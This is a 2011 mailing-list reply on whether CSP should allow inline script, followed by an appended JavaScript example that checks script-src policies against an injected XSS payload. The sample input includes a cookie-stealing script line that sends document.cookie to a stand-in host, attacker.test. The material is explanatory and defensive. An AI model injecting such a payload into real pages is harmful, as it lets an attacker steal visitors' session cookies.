On 24/01/11 23:50, Adam Barth wrote:
> To pick on one example, adding "inline" as script-src is a disaster
> for security, yet it's tempting enough that a number of folks who
> I've seen try to use CSP decide to add it. IMHO, CSP would be better
> at mitigating XSS without the "inline" option for "script-src".

Well, if you don't use the 'inline' option, of course CSP is better at mitigating XSS ;-)

I think you mean: "CSP would mitigate more XSS attacks if the 'inline' option for 'script-src' were not a part of the spec and not implemented."

However, that's definitely a debatable point. If you make CSP too hard to adopt, fewer people will use it full stop - and so not get XSS protection, or any other protections. Allowing 'inline-src' makes the adoption curve for CSP less steep. Yes, some people will stop half way up the curve; but I would suggest that a less steep curve means that more people will persevere to the top.

Gerv

Received on Tuesday, 25 January 2011 14:50:24 UTC
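The point being argued above, shown in code rather than prose. This is an added example, not code from the thread, from Mozilla, or from the CSP spec: a minimal evaluator for the script-src directive of a Content-Security-Policy header, run against a constructed reflected-XSS payload under a policy that allows inline script and one that does not. The draft discussed in the thread called the keyword 'inline'; the CSP spec that eventually shipped spells it 'unsafe-inline', and the evaluator accepts both. The origins app.example, cdn.example and attacker.test are made up for the example, and host-source matching is deliberately simplified (scheme-only, exact host, or *.host wildcard) rather than the full spec algorithm.

```javascript
// Added example (not from the list post or the CSP spec): decide whether the
// script-src directive of a CSP header lets a given script run. Shows why a
// policy containing 'inline' / 'unsafe-inline' stops no injected <script>.

function parsePolicy(header) {
  // "script-src 'self' cdn.example; default-src 'none'" -> Map(name -> tokens)
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive name is ignored; the first occurrence wins.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function effectiveScriptSrc(directives) {
  // script-src falls back to default-src; with neither, scripts are unrestricted.
  if (directives.has('script-src')) return directives.get('script-src');
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

function hostMatches(pattern, origin) {
  // Simplified host-source matching (assumption of this example, not the spec):
  // "https:" (scheme only), "https://cdn.example", "cdn.example", "*.example.com", "*".
  const url = new URL(origin);
  const scheme = url.protocol.replace(':', '');
  let p = pattern.toLowerCase();
  if (/^[a-z][a-z0-9+.-]*:$/.test(p)) return p.slice(0, -1) === scheme;
  const m = p.match(/^([a-z][a-z0-9+.-]*):\/\//);
  if (m) {
    if (m[1] !== scheme) return false;
    p = p.slice(m[0].length);
  }
  if (p === '*') return true;
  if (p.startsWith('*.')) return url.hostname.endsWith(p.slice(1)); // ".example.com"
  return p === url.hostname;
}

// request is either { inline: true } for a <script>...</script> in the page,
// or { src: 'https://host/path.js' } for an external script.
function scriptSrcAllows(header, request, documentOrigin) {
  const sources = effectiveScriptSrc(parsePolicy(header));
  if (sources === null) return true;
  const toks = sources.map(t => t.toLowerCase());
  if (request.inline) {
    // Inline script runs only if the policy explicitly opts in to it.
    return toks.includes("'unsafe-inline'") || toks.includes("'inline'");
  }
  const origin = new URL(request.src).origin;
  return toks.some(tok => {
    if (tok === "'self'") return origin === documentOrigin;
    if (tok.startsWith("'")) return false; // 'none', 'unsafe-inline', etc. never match a URL
    return hostMatches(tok, origin);
  });
}

// Constructed sample input: one injected payload, two candidate policies.
const DOC_ORIGIN = 'https://app.example';
const INJECTED = { inline: true, body: "<script>new Image().src='https://attacker.test/?c='+document.cookie</script>" };
const WEAK_POLICY = "script-src 'self' 'unsafe-inline'";
const HARDENED_POLICY = "script-src 'self' https://cdn.example";

function demo() {
  return {
    injectedUnderWeak: scriptSrcAllows(WEAK_POLICY, INJECTED, DOC_ORIGIN),
    injectedUnderHardened: scriptSrcAllows(HARDENED_POLICY, INJECTED, DOC_ORIGIN),
    cdnUnderHardened: scriptSrcAllows(HARDENED_POLICY, { src: 'https://cdn.example/app.js' }, DOC_ORIGIN),
    attackerUnderHardened: scriptSrcAllows(HARDENED_POLICY, { src: 'https://attacker.test/x.js' }, DOC_ORIGIN),
  };
}

console.log(demo());
```

Running demo() reports that the injected inline script is allowed under WEAK_POLICY and blocked under HARDENED_POLICY, while HARDENED_POLICY still lets the page load its own and cdn.example scripts and refuses attacker.test. That is the whole trade-off in the thread: the hardened policy is the one that actually mitigates the XSS, but it also forces the site to move every inline script into external files before the policy can be deployed.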